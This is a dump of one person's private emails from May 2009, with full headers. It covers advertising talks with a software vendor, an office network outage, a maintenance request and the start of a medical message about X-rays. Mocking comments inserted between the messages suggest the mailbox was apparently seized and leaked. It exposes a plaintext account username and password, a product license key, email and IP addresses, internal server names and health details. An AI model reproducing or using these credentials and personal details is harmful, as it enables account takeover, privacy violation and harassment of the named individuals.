Solutions Knowledge Base] Network security Date: Fri, 22 May 2009 16:03:13 +0200 Message-ID: In-Reply-To: <4b20eb360905220654l23dc52aap72954c65559f8b6b@mail.gmail.com> X-MS-Has-Attach: X-MS-TNEF-Correlator: Thread-Topic: [IT Solutions Knowledge Base] Network security thread-index: Acna5O/XjlflHF4AQnybz9ykdPt+bwAAPUvw References: <4b20eb360905220629yab2e60dn6473432f121e0664@mail.gmail.com> <4b20eb360905220654l23dc52aap72954c65559f8b6b@mail.gmail.com> From: "Edward Lansink" To: "Glafkos Charalambous" This is a multi-part message in MIME format. ------_=_NextPart_001_01C9DAE6.09D781FE Content-Type: text/plain; charset="us-ascii" Content-Transfer-Encoding: quoted-printable Thanks Glafkos, One more thing: How large is the network you'd like to try GFI LANguard on please? An estimate number of IP addresses is what I'm looking for. We do advertise on IT sites but it really depends on the number of unique visitors your site gets per month. Can you tell me what that figure is please? Best regards, Edward Lansink GFI Software - www.gfi.com ############################################################################ MIME-Version: 1.0 Received: by 10.223.119.65 with HTTP; Fri, 22 May 2009 07:24:11 -0700 (PDT) In-Reply-To: References: <4b20eb360905220629yab2e60dn6473432f121e0664@mail.gmail.com> <4b20eb360905220654l23dc52aap72954c65559f8b6b@mail.gmail.com> Date: Fri, 22 May 2009 17:24:11 +0300 Delivered-To: glafkos@gmail.com Message-ID: <4b20eb360905220724x7a0eccb6hac3fc1891b75887f@mail.gmail.com> Subject: Re: [IT Solutions Knowledge Base] Network security From: Glafkos Charalambous To: Edward Lansink Content-Type: multipart/mixed; boundary=0016e6d375b7b16f00046a8103d4 --0016e6d375b7b16f00046a8103d4 Content-Type: multipart/alternative; boundary=0016e6d375b7b16efc046a8103d2 --0016e6d375b7b16efc046a8103d2 Content-Type: text/plain; charset=windows-1252 Content-Transfer-Encoding: quoted-printable 1) The network is 20 machines as I do not want to demonstrate this on larger companies yet. 2) Concerning the site I can send you daily reports of the status. The unique visitors are around 720 since the last 3 days and day by day we are growing larger and larger. The site is only 6 months old. We can be found on top searches and we have a very good ranking on google. The reason behind this is that our articles are unique and covering many different products and solutions and I am sure that you will target specific people through our site. Only for IT Solutions we are on third page 24th out of 130 Million results. Ref: http://www.google.com/#q=3Dit+solutions&hl=3Den&start=3D20&sa=3DN&fp=3DEPM4eul9pXk Thanks, Glafkos ############################################################################ Delivered-To: glafkos@gmail.com Received: by 10.223.119.65 with SMTP id y1cs65483faq; Fri, 22 May 2009 07:39:46 -0700 (PDT) Received: by 10.86.92.9 with SMTP id p9mr3204235fgb.15.1243003186556; Fri, 22 May 2009 07:39:46 -0700 (PDT) Return-Path: Received: from smtpmt01.gfi.com (smtpmt01.gfi.com [78.133.123.219]) by mx.google.com with ESMTP id l19si1078590fgb.2.2009.05.22.07.39.46; Fri, 22 May 2009 07:39:46 -0700 (PDT) Received-SPF: pass (google.com: domain of ELansink@gfi.com designates 78.133.123.219 as permitted sender) client-ip=78.133.123.219; Authentication-Results: mx.google.com; spf=pass (google.com: domain of ELansink@gfi.com designates 78.133.123.219 as permitted sender) smtp.mail=ELansink@gfi.com Content-Class: urn:content-classes:message MIME-Version: 1.0 Content-Type: multipart/alternative; boundary="----_=_NextPart_001_01C9DAEB.29E51E44" X-MimeOLE: Produced By Microsoft MimeOLE V6.00.3790.4325 Subject: RE: [IT Solutions Knowledge Base] Network security Date: Fri, 22 May 2009 16:39:41 +0200 Message-ID: In-Reply-To: <4b20eb360905220724x7a0eccb6hac3fc1891b75887f@mail.gmail.com> X-MS-Has-Attach: X-MS-TNEF-Correlator: Thread-Topic: [IT Solutions Knowledge Base] Network security thread-index: Acna6QKi4p9m4UZSQkKVQfrQBdkp+wAAULGQ References: <4b20eb360905220629yab2e60dn6473432f121e0664@mail.gmail.com> <4b20eb360905220654l23dc52aap72954c65559f8b6b@mail.gmail.com> <4b20eb360905220724x7a0eccb6hac3fc1891b75887f@mail.gmail.com> From: "Edward Lansink" To: "Glafkos Charalambous" This is a multi-part message in MIME format. ------_=_NextPart_001_01C9DAEB.29E51E44 Content-Type: text/plain; charset="us-ascii" Content-Transfer-Encoding: quoted-printable For a 6 month old site that’s pretty reasonable traffic you have I must say and with that design I’m sure you’ll be able to grow further. Even though traffic is still on the low side, if you can offer us a position with high visibility we can work out something. If anything, it will be text links and maybe a logo and on the left hand side of the site, not a banner and on the right hand side. Do you think that would work for you? The cost would obviously depend on the positioning… Edward Edward Lansink GFI Software - www.gfi.com ############################################################################ MIME-Version: 1.0 Received: by 10.223.119.65 with HTTP; Fri, 22 May 2009 07:50:13 -0700 (PDT) In-Reply-To: References: <4b20eb360905220629yab2e60dn6473432f121e0664@mail.gmail.com> <4b20eb360905220654l23dc52aap72954c65559f8b6b@mail.gmail.com> <4b20eb360905220724x7a0eccb6hac3fc1891b75887f@mail.gmail.com> Date: Fri, 22 May 2009 17:50:13 +0300 Delivered-To: glafkos@gmail.com Message-ID: <4b20eb360905220750kc39929cq99d79c5dbbef25f6@mail.gmail.com> Subject: Re: [IT Solutions Knowledge Base] Network security From: Glafkos Charalambous To: Edward Lansink Content-Type: multipart/alternative; boundary=001636c5ac93bde1ef046a81606a --001636c5ac93bde1ef046a81606a Content-Type: text/plain; charset=windows-1252 Content-Transfer-Encoding: quoted-printable Thanks Edward. I can put an advertisement of yours in front of the page on the slideshow header if you are interested and on subpages on the right. I am attaching you 2 photos of the places that we can put the advertisements. Regards, Glafkos ############################################################################ Delivered-To: glafkos@gmail.com Received: by 10.223.115.70 with SMTP id h6cs370125faq; Wed, 27 May 2009 07:26:08 -0700 (PDT) Received: by 10.86.59.18 with SMTP id h18mr227054fga.44.1243434367537; Wed, 27 May 2009 07:26:07 -0700 (PDT) Return-Path: Received: from smtpmt01.gfi.com (smtpmt01.gfi.com [78.133.123.219]) by mx.google.com with ESMTP id 12si3098565fgg.15.2009.05.27.07.26.06; Wed, 27 May 2009 07:26:07 -0700 (PDT) Received-SPF: pass (google.com: domain of ELansink@gfi.com designates 78.133.123.219 as permitted sender) client-ip=78.133.123.219; Authentication-Results: mx.google.com; spf=pass (google.com: domain of ELansink@gfi.com designates 78.133.123.219 as permitted sender) smtp.mail=ELansink@gfi.com X-MimeOLE: Produced By Microsoft MimeOLE V6.00.3790.4325 Content-Class: urn:content-classes:message MIME-Version: 1.0 Content-Type: multipart/alternative; boundary="----_=_NextPart_001_01C9DED7.13B31021" Subject: RE: [IT Solutions Knowledge Base] Network security Date: Wed, 27 May 2009 16:25:52 +0200 Message-ID: In-Reply-To: <4b20eb360905220751v251f44abq784e43780bf25c41@mail.gmail.com> X-MS-Has-Attach: X-MS-TNEF-Correlator: Thread-Topic: [IT Solutions Knowledge Base] Network security thread-index: Acna7N/jTwkaSIB8RyaYTY54W7mgPQD6cFaw References: <4b20eb360905220629yab2e60dn6473432f121e0664@mail.gmail.com> <4b20eb360905220654l23dc52aap72954c65559f8b6b@mail.gmail.com> <4b20eb360905220724x7a0eccb6hac3fc1891b75887f@mail.gmail.com> <4b20eb360905220750kc39929cq99d79c5dbbef25f6@mail.gmail.com> <4b20eb360905220751v251f44abq784e43780bf25c41@mail.gmail.com> From: "Edward Lansink" To: "Glafkos Charalambous" This is a multi-part message in MIME format. ------_=_NextPart_001_01C9DED7.13B31021 Content-Type: text/plain; charset="us-ascii" Content-Transfer-Encoding: quoted-printable Hi Glafkos, I see you got the license key for LANSS alright. Thanks again for writing about GFI LANguard, much appreciated! As for advertising, I understand the spots you mentioned are the main ones for your site but I think the first option is too big and "in your face" and the second is in a position where it won't get much attention. Do you think you could offer us a small image and 5 words of text between the language and category widgets on the left hand side instead? I'd like to work with you on advertising to help support the site but in the end what counts to us is that enough people come to our website and try out our software. If we don't get enough downloads I can't continue advertising on your site, that's why I'm trying to find a solution that will work best for both of us. Best regards, Edward Edward Lansink GFI Software - www.gfi.com ############################################################################ MIME-Version: 1.0 Received: by 10.223.115.70 with HTTP; Wed, 27 May 2009 08:35:50 -0700 (PDT) In-Reply-To: References: <4b20eb360905220629yab2e60dn6473432f121e0664@mail.gmail.com> <4b20eb360905220654l23dc52aap72954c65559f8b6b@mail.gmail.com> <4b20eb360905220724x7a0eccb6hac3fc1891b75887f@mail.gmail.com> <4b20eb360905220750kc39929cq99d79c5dbbef25f6@mail.gmail.com> <4b20eb360905220751v251f44abq784e43780bf25c41@mail.gmail.com> Date: Wed, 27 May 2009 18:35:50 +0300 Delivered-To: glafkos@gmail.com Message-ID: <4b20eb360905270835q478f302cm7142ae62f38d9613@mail.gmail.com> Subject: Re: [IT Solutions Knowledge Base] Network security From: Glafkos Charalambous To: Edward Lansink Content-Type: multipart/alternative; boundary=00504502d6f21ea0a1046ae6992e --00504502d6f21ea0a1046ae6992e Content-Type: text/plain; charset=windows-1252 Content-Transfer-Encoding: quoted-printable Hello Edward, Thank you for the license. I can place the AD in the place you need and we can see how well it goes with the traffic. I am very open minded to more suggestions Regards, Glafkos // ... and it goes on and on, We took your domain, you can't advertise there anymore. ############################################################################ Delivered-To: glafkos@gmail.com Received: by 10.223.115.70 with SMTP id h6cs485179faq; Thu, 28 May 2009 23:09:26 -0700 (PDT) Received: by 10.211.196.13 with SMTP id y13mr1783562ebp.86.1243577366220; Thu, 28 May 2009 23:09:26 -0700 (PDT) Return-Path: Received: from alboreto.otenet-telecom.net (alboreto.otenet-telecom.net [213.207.140.122]) by mx.google.com with ESMTP id 18si1426559ewy.45.2009.05.28.23.09.25; Thu, 28 May 2009 23:09:26 -0700 (PDT) Received-SPF: neutral (google.com: 213.207.140.122 is neither permitted nor denied by best guess record for domain of polis.yiannoudes@uibs.net) client-ip=213.207.140.122; Authentication-Results: mx.google.com; spf=neutral (google.com: 213.207.140.122 is neither permitted nor denied by best guess record for domain of polis.yiannoudes@uibs.net) smtp.mail=polis.yiannoudes@uibs.net Received: from localhost (localhost [127.0.0.1]) by alboreto.otenet-telecom.net (Postfix) with ESMTP id 50B5C57B1; Fri, 29 May 2009 09:09:25 +0300 (EEST) X-Virus-Scanned: Debian amavisd-new at alboreto.otenet-telecom.net Received: from alboreto.otenet-telecom.net ([127.0.0.1]) by localhost (alboreto.otenet-telecom.net [127.0.0.1]) (amavisd-new, port 10024) with ESMTP id qKaIhjnoCnoU; Fri, 29 May 2009 09:09:16 +0300 (EEST) Received: from mail.uibs.net (unknown [213.207.156.52]) by alboreto.otenet-telecom.net (Postfix) with ESMTP id 168564F42; Fri, 29 May 2009 09:09:16 +0300 (EEST) Received: from ERMIS.uibs.local ([fe80::2ddf:ce8e:ab88:171]) by ERMIS.uibs.local ([fe80::2ddf:ce8e:ab88:171%19]) with mapi; Fri, 29 May 2009 09:08:22 +0300 From: Polykarpos Yiannoudes To: Glafkos Charalambous , Panagiotis Charalambous , Altis - Louis Loizou CC: Anna Charalambous Date: Fri, 29 May 2009 09:08:20 +0300 Subject: http://support.uibs.net/ and Staging Thread-Topic: http://support.uibs.net/ and Staging Thread-Index: AcngI93cEBf8ABFmScmlKvFsZmHlQg== Message-ID: Accept-Language: en-US, en-GB Content-Language: en-US X-MS-Has-Attach: X-MS-TNEF-Correlator: acceptlanguage: en-US, en-GB Content-Type: multipart/alternative; boundary="_000_A839B4C22E5430408D1B9C0B96C216CC94D3CF9F98ERMISuibsloca_" MIME-Version: 1.0 --_000_A839B4C22E5430408D1B9C0B96C216CC94D3CF9F98ERMISuibsloca_ Content-Type: text/plain; charset="us-ascii" Content-Transfer-Encoding: quoted-printable Dear All, Staging and its websites are not responding from outside. Panagiotis please contact Glafkos and Louis to resolve this issue. Thank you ############################################################################ Delivered-To: glafkos@gmail.com Received: by 10.223.115.70 with SMTP id h6cs489305faq; Fri, 29 May 2009 00:14:54 -0700 (PDT) Received: by 10.210.63.18 with SMTP id l18mr2018549eba.97.1243581294227; Fri, 29 May 2009 00:14:54 -0700 (PDT) Return-Path: Received: from alboreto.otenet-telecom.net (alboreto.otenet-telecom.net [213.207.140.122]) by mx.google.com with ESMTP id 23si1290886ewy.116.2009.05.29.00.14.53; Fri, 29 May 2009 00:14:54 -0700 (PDT) Received-SPF: neutral (google.com: 213.207.140.122 is neither permitted nor denied by best guess record for domain of panagiotis@uibs.net) client-ip=213.207.140.122; Authentication-Results: mx.google.com; spf=neutral (google.com: 213.207.140.122 is neither permitted nor denied by best guess record for domain of panagiotis@uibs.net) smtp.mail=panagiotis@uibs.net Received: from localhost (localhost [127.0.0.1]) by alboreto.otenet-telecom.net (Postfix) with ESMTP id 4C63E5818; Fri, 29 May 2009 10:14:53 +0300 (EEST) X-Virus-Scanned: Debian amavisd-new at alboreto.otenet-telecom.net Received: from alboreto.otenet-telecom.net ([127.0.0.1]) by localhost (alboreto.otenet-telecom.net [127.0.0.1]) (amavisd-new, port 10024) with ESMTP id ZAJKLMdRIoH3; Fri, 29 May 2009 10:14:44 +0300 (EEST) Received: from mail.uibs.net (unknown [213.207.156.52]) by alboreto.otenet-telecom.net (Postfix) with ESMTP id 724485812; Fri, 29 May 2009 10:14:44 +0300 (EEST) Received: from ERMIS.uibs.local ([fe80::2ddf:ce8e:ab88:171]) by ERMIS.uibs.local ([fe80::2ddf:ce8e:ab88:171%19]) with mapi; Fri, 29 May 2009 10:13:51 +0300 From: Panagiotis Charalambous To: Polykarpos Yiannoudes , Glafkos Charalambous , Altis - Louis Loizou CC: Anna Charalambous Date: Fri, 29 May 2009 10:13:49 +0300 Subject: RE: http://support.uibs.net/ and Staging Thread-Topic: http://support.uibs.net/ and Staging Thread-Index: AcngI93cEBf8ABFmScmlKvFsZmHlQgACKtxA Message-ID: References: In-Reply-To: Accept-Language: en-US, en-GB Content-Language: en-US X-MS-Has-Attach: X-MS-TNEF-Correlator: acceptlanguage: en-US, en-GB Content-Type: multipart/alternative; boundary="_000_A839B4C22E5430408D1B9C0B96C216CC94D3CF9FA3ERMISuibsloca_" MIME-Version: 1.0 --_000_A839B4C22E5430408D1B9C0B96C216CC94D3CF9FA3ERMISuibsloca_ Content-Type: text/plain; charset="us-ascii" Content-Transfer-Encoding: quoted-printable Dear All, I am getting the following error while trying to access staging web sites http://support.microsoft.com/kb/944114 It seems that something is wrong with the network configuration but I do no= t have the privileges to check. It seems that infosec is used as a proxy fo= r stating and is causing this issue. Please check I have already mentioned this to Glafkos to investigate. Thanks, Panagiotis From: Polykarpos Yiannoudes Sent: Friday, May 29, 2009 9:08 AM To: Glafkos Charalambous; Panagiotis Charalambous; Altis - Louis Loizou Cc: Anna Charalambous Subject: http://support.uibs.net/ and Staging Dear All, Staging and its websites are not responding from outside. Panagiotis please contact Glafkos and Louis to resolve this issue. Thank you ############################################################################ Return-Path: Received: from UiBSSupport ([91.184.220.239]) by mx.google.com with ESMTPS id 28sm2021713eye.36.2009.05.29.00.58.45 (version=SSLv3 cipher=RC4-MD5); Fri, 29 May 2009 00:58:46 -0700 (PDT) From: "Glafkos Charalambous" To: "'Polykarpos Yiannoudes'" , "'Panagiotis Charalambous'" , "'Altis - Louis Loizou'" Cc: "'Anna Charalambous'" References: In-Reply-To: Subject: RE: http://support.uibs.net/ and Staging Date: Fri, 29 May 2009 10:58:00 +0300 Message-ID: <00cb01c9e033$315f4190$941dc4b0$@com> MIME-Version: 1.0 Content-Type: multipart/alternative; boundary="----=_NextPart_000_00CC_01C9E04C.56AC7990" X-Mailer: Microsoft Office Outlook 12.0 Thread-Index: AcngI93cEBf8ABFmScmlKvFsZmHlQgADoLhQ Content-Language: en-us This is a multi-part message in MIME format. ------=_NextPart_000_00CC_01C9E04C.56AC7990 Content-Type: text/plain; charset="US-ASCII" Content-Transfer-Encoding: 7bit Dear all, I have checked everything and I finally noticed that there is an issue with the network cables on HP_DL380A server. Both network cards have internal network access and thus causing the staging server not to take the external IP directly from Otenet. Please someone to get on the server room and give me a phone call. Regards, Glafkos ############################################################################ Delivered-To: glafkos@gmail.com Received: by 10.223.115.70 with SMTP id h6cs492876faq; Fri, 29 May 2009 01:09:22 -0700 (PDT) Received: by 10.210.43.10 with SMTP id q10mr3867448ebq.17.1243584562256; Fri, 29 May 2009 01:09:22 -0700 (PDT) Return-Path: Received: from mail.altiscy.com (81-156-25.static.cytanet.com.cy [81.4.156.25]) by mx.google.com with ESMTP id 5si2038451eyh.10.2009.05.29.01.09.19; Fri, 29 May 2009 01:09:21 -0700 (PDT) Received-SPF: neutral (google.com: 81.4.156.25 is neither permitted nor denied by best guess record for domain of louis.loizou@altiscy.com) client-ip=81.4.156.25; Authentication-Results: mx.google.com; spf=neutral (google.com: 81.4.156.25 is neither permitted nor denied by best guess record for domain of louis.loizou@altiscy.com) smtp.mail=louis.loizou@altiscy.com Received: from louisnb ( [217.175.219.197]) by mail.altiscy.com with SMTP (MailFountain 1.5.8.20) (envelope-from rDNS=ok) for polis.yiannoudes@uibs.net panagiotis@uibs.net glafkos@gmail.com anna.charalambous@uibs.net; Fri, 29 May 2009 11:08:37 From: "Altis - Louis Loizou" To: "'Glafkos Charalambous'" , "'Polykarpos Yiannoudes'" , "'Panagiotis Charalambous'" Cc: "'Anna Charalambous'" References: <00cb01c9e033$315f4190$941dc4b0$@com> In-Reply-To: <00cb01c9e033$315f4190$941dc4b0$@com> Subject: RE: http://support.uibs.net/ and Staging Date: Fri, 29 May 2009 11:08:42 +0300 Message-ID: <007001c9e034$afc36830$0f4a3890$@loizou@altiscy.com> MIME-Version: 1.0 Content-Type: multipart/alternative; boundary="----=_NextPart_000_0071_01C9E04D.D510A030" X-Mailer: Microsoft Office Outlook 12.0 Thread-Index: AcngI93cEBf8ABFmScmlKvFsZmHlQgADoLhQAAB9LYA= Content-Language: en-gb This is a multi-part message in MIME format. ------=_NextPart_000_0071_01C9E04D.D510A030 Content-Type: text/plain; charset="us-ascii" Content-Transfer-Encoding: 7bit Dear Glafko, Only one cable (white) is connected on internal network (Switch) and the other (blue) is connected on Otenet's modem. This is the way was before I left last night. Regards, Louis ############################################################################ Return-Path: Received: from UiBSSupport ([91.184.220.239]) by mx.google.com with ESMTPS id 7sm2080489eyb.45.2009.05.29.01.32.32 (version=SSLv3 cipher=RC4-MD5); Fri, 29 May 2009 01:32:33 -0700 (PDT) From: "Glafkos Charalambous" To: "'Altis - Louis Loizou'" , "'Polykarpos Yiannoudes'" , "'Panagiotis Charalambous'" Cc: "'Anna Charalambous'" References: <00cb01c9e033$315f4190$941dc4b0$@com> <007001c9e034$afc36830$0f4a3890$@loizou@altiscy.com> In-Reply-To: <007001c9e034$afc36830$0f4a3890$@loizou@altiscy.com> Subject: RE: http://support.uibs.net/ and Staging Date: Fri, 29 May 2009 11:31:46 +0300 Message-ID: <00d601c9e037$e94228a0$bbc679e0$@com> MIME-Version: 1.0 Content-Type: multipart/alternative; boundary="----=_NextPart_000_00D7_01C9E051.0E8F60A0" X-Mailer: Microsoft Office Outlook 12.0 Thread-Index: AcngI93cEBf8ABFmScmlKvFsZmHlQgADoLhQAAB9LYAAAMiHMA== Content-Language: en-us This is a multi-part message in MIME format. ------=_NextPart_000_00D7_01C9E051.0E8F60A0 Content-Type: text/plain; charset="US-ASCII" Content-Transfer-Encoding: 7bit Hello Louis, Then I think we are missing one more cable that has to be directly connected to HP_DL380A on the second card interface. The main reason is that we are not getting external ip directly from Otenet modem. Does anyone has access to server room as Polys is not in the office? Regards, Glafkos ############################################################################ Delivered-To: glafkos@gmail.com Received: by 10.223.115.70 with SMTP id h6cs495425faq; Fri, 29 May 2009 01:49:25 -0700 (PDT) Received: by 10.210.44.12 with SMTP id r12mr2142226ebr.41.1243586965450; Fri, 29 May 2009 01:49:25 -0700 (PDT) Return-Path: Received: from mail.altiscy.com (81-156-25.static.cytanet.com.cy [81.4.156.25]) by mx.google.com with ESMTP id 7si2111376eyg.47.2009.05.29.01.49.22; Fri, 29 May 2009 01:49:25 -0700 (PDT) Received-SPF: neutral (google.com: 81.4.156.25 is neither permitted nor denied by best guess record for domain of louis.loizou@altiscy.com) client-ip=81.4.156.25; Authentication-Results: mx.google.com; spf=neutral (google.com: 81.4.156.25 is neither permitted nor denied by best guess record for domain of louis.loizou@altiscy.com) smtp.mail=louis.loizou@altiscy.com Received: from louisnb ( [217.175.219.197]) by mail.altiscy.com with SMTP (MailFountain 1.5.8.20) (envelope-from rDNS=ok) for polis.yiannoudes@uibs.net panagiotis@uibs.net glafkos@gmail.com anna.charalambous@uibs.net; Fri, 29 May 2009 11:48:50 From: "Altis - Louis Loizou" To: "'Glafkos Charalambous'" , "'Polykarpos Yiannoudes'" , "'Panagiotis Charalambous'" Cc: "'Anna Charalambous'" References: <00cb01c9e033$315f4190$941dc4b0$@com> <007001c9e034$afc36830$0f4a3890$@loizou@altiscy.com> <00d601c9e037$e94228a0$bbc679e0$@com> In-Reply-To: <00d601c9e037$e94228a0$bbc679e0$@com> Subject: RE: http://support.uibs.net/ and Staging Date: Fri, 29 May 2009 11:48:56 +0300 Message-ID: <007801c9e03a$4e7623a0$eb626ae0$@loizou@altiscy.com> MIME-Version: 1.0 Content-Type: multipart/alternative; boundary="----=_NextPart_000_0079_01C9E053.73C35BA0" X-Mailer: Microsoft Office Outlook 12.0 Thread-Index: AcngI93cEBf8ABFmScmlKvFsZmHlQgADoLhQAAB9LYAAAMiHMAAAPugQ Content-Language: en-gb This is a multi-part message in MIME format. ------=_NextPart_000_0079_01C9E053.73C35BA0 Content-Type: text/plain; charset="us-ascii" Content-Transfer-Encoding: 7bit Hi Glafko, Both network cards are connected, one is connected on the internal network (switch) and the other card is connected on Otenet's modem. I believe the possible reasons we have this problem are: a) The cables of the network cards are connected reverse. b) We entered wrong IPs on the network card. If you have remote access please check this option. Regards Louis ############################################################################ Return-Path: Received: from UiBSSupport ([91.184.220.239]) by mx.google.com with ESMTPS id 7sm2168875eyb.55.2009.05.29.02.26.23 (version=SSLv3 cipher=RC4-MD5); Fri, 29 May 2009 02:26:24 -0700 (PDT) From: "Glafkos Charalambous" To: "'Altis - Louis Loizou'" , "'Polykarpos Yiannoudes'" , "'Panagiotis Charalambous'" Cc: "'Anna Charalambous'" References: <00cb01c9e033$315f4190$941dc4b0$@com> <007001c9e034$afc36830$0f4a3890$@loizou@altiscy.com> <00d601c9e037$e94228a0$bbc679e0$@com> <007801c9e03a$4e7623a0$eb626ae0$@loizou@altiscy.com> In-Reply-To: <007801c9e03a$4e7623a0$eb626ae0$@loizou@altiscy.com> Subject: RE: http://support.uibs.net/ and Staging Date: Fri, 29 May 2009 12:25:37 +0300 Message-ID: <00de01c9e03f$6ebc5e90$4c351bb0$@com> MIME-Version: 1.0 Content-Type: multipart/alternative; boundary="----=_NextPart_000_00DF_01C9E058.94099690" X-Mailer: Microsoft Office Outlook 12.0 Thread-Index: AcngI93cEBf8ABFmScmlKvFsZmHlQgADoLhQAAB9LYAAAMiHMAAAPugQAAFzekA= Content-Language: en-us This is a multi-part message in MIME format. ------=_NextPart_000_00DF_01C9E058.94099690 Content-Type: text/plain; charset="US-ASCII" Content-Transfer-Encoding: 7bit Hi Louis, I checked everything remotely before. 1. There is no problem with the IPs entered as I had double check them. 2. If the cables were connected in reverse it shouldn't matter as we are getting both internal IPs and we should have got at least one internal and one external with 169. IP range as it is set to dynamic. 3. Three machines on the network Anna, Elena and Kate are not receiving an IP Address on the network also. We need access on the server room to check network cables. It makes sense that we need only one cable from Otenet modem to HP_DL380A second card and the staging issue will be solved (maybe there is a mis configuration on the cables between CISCO, Otenet and the Switch I can't verify) Concerning the 3 machines that do not have network access I believe a cable must be disconnected and I cannot confirm as I can't see the server room. Regards, Glafkos ############################################################################ Delivered-To: glafkos@gmail.com Received: by 10.223.115.70 with SMTP id h6cs442850faq; Thu, 28 May 2009 09:17:58 -0700 (PDT) Received: by 10.210.143.11 with SMTP id q11mr886187ebd.66.1243527477686; Thu, 28 May 2009 09:17:57 -0700 (PDT) Return-Path: Received: from alboreto.otenet-telecom.net (alboreto.otenet-telecom.net [213.207.140.122]) by mx.google.com with ESMTP id 7si260241ewy.34.2009.05.28.09.17.56; Thu, 28 May 2009 09:17:57 -0700 (PDT) Received-SPF: neutral (google.com: 213.207.140.122 is neither permitted nor denied by best guess record for domain of polis.yiannoudes@uibs.net) client-ip=213.207.140.122; Authentication-Results: mx.google.com; spf=neutral (google.com: 213.207.140.122 is neither permitted nor denied by best guess record for domain of polis.yiannoudes@uibs.net) smtp.mail=polis.yiannoudes@uibs.net Received: from localhost (localhost [127.0.0.1]) by alboreto.otenet-telecom.net (Postfix) with ESMTP id 989BC56E0 for ; Thu, 28 May 2009 19:17:54 +0300 (EEST) X-Virus-Scanned: Debian amavisd-new at alboreto.otenet-telecom.net Received: from alboreto.otenet-telecom.net ([127.0.0.1]) by localhost (alboreto.otenet-telecom.net [127.0.0.1]) (amavisd-new, port 10024) with ESMTP id R80EE6aJo98R for ; Thu, 28 May 2009 19:17:48 +0300 (EEST) Received: from mail.uibs.net (unknown [213.207.156.52]) by alboreto.otenet-telecom.net (Postfix) with ESMTP id 3E78356EA for ; Thu, 28 May 2009 19:17:48 +0300 (EEST) Received: from ERMIS.uibs.local ([fe80::2ddf:ce8e:ab88:171]) by ERMIS.uibs.local ([fe80::2ddf:ce8e:ab88:171%19]) with mapi; Thu, 28 May 2009 19:17:00 +0300 From: Polykarpos Yiannoudes To: Glafkos Charalambous , Glafkos Charalambous Date: Thu, 28 May 2009 19:16:57 +0300 Subject: Plan Thread-Topic: Plan Thread-Index: Acnfr7lXWUtFse1QStC8/q3uOpnlDQ== Message-ID: Accept-Language: en-US, en-GB Content-Language: en-US X-MS-Has-Attach: X-MS-TNEF-Correlator: acceptlanguage: en-US, en-GB Content-Type: multipart/alternative; boundary="_000_A839B4C22E5430408D1B9C0B96C216CC94D3CF9F93ERMISuibsloca_" MIME-Version: 1.0 --_000_A839B4C22E5430408D1B9C0B96C216CC94D3CF9F93ERMISuibsloca_ Content-Type: text/plain; charset="us-ascii" Content-Transfer-Encoding: quoted-printable Dear Glafko, Thank you fro you help today! Please submit your Server maintenance plan for UiBS. There is a lot maintenance behind, error s in most servers logs, review of= SCE etc..I don't think is anyone using it etc. Looking forward to your feedback on how we proceed. Please turn on the mobi= le number And also send me a document map of our network. Kind regards, P. ############################################################################ MIME-Version: 1.0 Received: by 10.223.115.70 with HTTP; Thu, 28 May 2009 12:58:11 -0700 (PDT) In-Reply-To: References: Date: Thu, 28 May 2009 22:58:11 +0300 Delivered-To: glafkos@gmail.com Message-ID: <4b20eb360905281258m139c82d5r57cd1a5c2eb79c60@mail.gmail.com> Subject: Re: Plan From: Glafkos Charalambous To: Polykarpos Yiannoudes Content-Type: multipart/alternative; boundary=0016368e2bd635c388046afe61b2 --0016368e2bd635c388046afe61b2 Content-Type: text/plain; charset=windows-1252 Content-Transfer-Encoding: quoted-printable Hello Poly, NP for today. I do not do any maintenance on UiBS as I am only working with tickets and i= f some times I see something not alright I fix it. I will create a maintenance plan for UiBS Also I will create a network map for UiBS. Regards Glafkos When do you think will be a good tiem to have a meeting ? When you have tim= e of course I understand that your hours are full because of work. ############################################################################ Delivered-To: glafkos@gmail.com Received: by 10.223.115.70 with SMTP id h6cs345144faq; Wed, 27 May 2009 01:09:19 -0700 (PDT) Received: by 10.86.91.13 with SMTP id o13mr7990609fgb.7.1243411759727; Wed, 27 May 2009 01:09:19 -0700 (PDT) Return-Path: Received: from smtpmt01.gfi.com (smtpmt01.gfi.com [78.133.123.219]) by mx.google.com with ESMTP id e11si1822514fga.26.2009.05.27.01.09.19; Wed, 27 May 2009 01:09:19 -0700 (PDT) Received-SPF: pass (google.com: domain of MBriffa@gfi.com designates 78.133.123.219 as permitted sender) client-ip=78.133.123.219; Authentication-Results: mx.google.com; spf=pass (google.com: domain of MBriffa@gfi.com designates 78.133.123.219 as permitted sender) smtp.mail=MBriffa@gfi.com X-MimeOLE: Produced By Microsoft MimeOLE V6.00.3790.4325 Content-Class: urn:content-classes:message MIME-Version: 1.0 Content-Type: multipart/alternative; boundary="----_=_NextPart_001_01C9DEA2.6FCA9FC1" Subject: NFR Keys Date: Wed, 27 May 2009 10:09:24 +0200 Message-ID: X-MS-Has-Attach: X-MS-TNEF-Correlator: Thread-Topic: NFR Keys thread-index: AcneonKkClJGt0bFTCaN99DD8QXEBQ== From: "Michelle Briffa" To: CC: "Edward Lansink" This is a multi-part message in MIME format. ------_=_NextPart_001_01C9DEA2.6FCA9FC1 Content-Type: text/plain; charset="us-ascii" Content-Transfer-Encoding: quoted-printable Dear Sir/Madam, Thank you for your request! You can find the NFR license key you have requested below. CID: 165159 (Marketing ) ITSolutionsKB.com Username: k3oxziwb13okaao=20 Password: di6xo3ibxi6kstz Product: GFI LANguard 9 Number of units: 32 Valid till: 2010-05-27 License key: UHb2szLZ0sSXd-Fhn9UXWyCzY0xC2mftf-P-677171 Should you have any queries please do not hesitate to contact me. Kind regards, Michelle Briffa - mbriffa@gfi.com=20 Sales Order Processor - GFI Software - www.gfi.com Web & Mail Security, Archiving & Fax, Networking & Security Tel: +356 22052000 (ext: 2127) Fax: +356 21382419 // Free license key, wohooo. ############################################################################ MIME-Version: 1.0 Received: by 10.223.119.65 with HTTP; Fri, 8 May 2009 00:29:08 -0700 (PDT) Date: Fri, 8 May 2009 10:29:08 +0300 Delivered-To: glafkos@gmail.com Message-ID: <4b20eb360905080029v2fdbe7d0t204174bda616430d@mail.gmail.com> Subject: Glafkos Cyprys XRAYS at 4.7 CM From: Glafkos Charalambous To: mitkovic@gmail.com Content-Type: multipart/mixed; boundary=001636c5b90e9376bd0469619563 --001636c5b90e9376bd0469619563 Content-Type: multipart/alternative; boundary=001636c5b90e9376b60469619561 --001636c5b90e9376b60469619561 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 7bit Hello Dr, I am sending you my X-RAYS to update me on my status and progress. I am currently having pain on my left leg in the front where the bone is broken and I feel that 